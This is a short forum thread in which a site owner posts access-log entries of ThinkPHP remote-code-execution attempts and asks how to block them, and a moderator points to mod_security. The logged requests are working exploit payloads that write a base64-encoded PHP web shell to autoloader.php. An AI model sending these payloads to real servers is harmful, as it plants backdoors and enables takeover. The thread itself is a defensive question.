Apache :: weird hack attempt and how to safeguard against it

Apache LoungeWebmasters

About Forum Index Downloads Search Register Log in RSS X

Keep Server Online

If you find the Apache Lounge, the downloads and overall help useful, please express your satisfaction with a donation.

or

A donation makes a contribution towards the costs, the time and effort that's going in this site and building.

Thank You! Steffen

Your donations will help to keep this site alive and well, and continuing building binaries. Apache Lounge is not sponsored.

Forum Index -> Apache

View previous topic :: View next topic

Topic: weird hack attempt and how to safeguard against it

Author

edwardsmarkf

Joined: 20 Feb 2013
Posts: 25
Location: cottonwood, az

Posted: Fri 17 Jan '20 18:15 Post subject: weird hack attempt and how to safeguard against it

hello - i received the following hack attempts from ip: 113.250.254.93

Quote:

"GET /public/?s=.%7Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=file_put_contents+(+%22autoloader.php%22,base64_decode+(+%22PD9waHAgZXZhbChnZXRfZGVmaW5lZF92YXJzKClbJ19QT1NUJ11bdHJ1ZV0pOyA/Pg==%22+)+) HTTP/1.1" 404 28417 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider"

Quote:

"GET /public/?s=.%7Cthink%5CContainer/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=file_put_contents+(+%22autoloader.php%22,base64_decode+(+%22PD9waHAgZXZhbChnZXRfZGVmaW5lZF92YXJzKClbJ19QT1NUJ11bdHJ1ZV0pOyA/Pg==%22+)+) HTTP/1.1" 404 28417 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider"

Quote:

"GET /public/?s=.%7Cthink%5CRequest/cache&key=file_put_contents+(+%22autoloader.php%22,base64_decode+(+%22PD9waHAgZXZhbChnZXRfZGVmaW5lZF92YXJzKClbJ19QT1NUJ11bdHJ1ZV0pOyA/Pg==%22+)+)%7Cassert HTTP/1.1" 404 28444 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider"

Quote:

"GET /public/?s=.%7Cthink%5CRequest/input&filter=assert&data[]=file_put_contents+(+%22autoloader.php%22,base64_decode+(+%22PD9waHAgZXZhbChnZXRfZGVmaW5lZF92YXJzKClbJ19QT1NUJ11bdHJ1ZV0pOyA/Pg==%22+)+) HTTP/1.1" 404 28417 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider"

is there any mechanism in place to safeguard against such hack attempts?

also, i reported it here: https://www.abuseipdb.com/report?ip=113.250.254.93

James Blond
Moderator

Joined: 19 Jan 2006
Posts: 7371
Location: Germany, Next to Hamburg

Posted: Mon 20 Jan '20 10:55 Post subject:

mod_security can prevent such things

Topic: weird hack attempt and how to safeguard against it

View previous topic :: View next topic

Forum Index -> Apache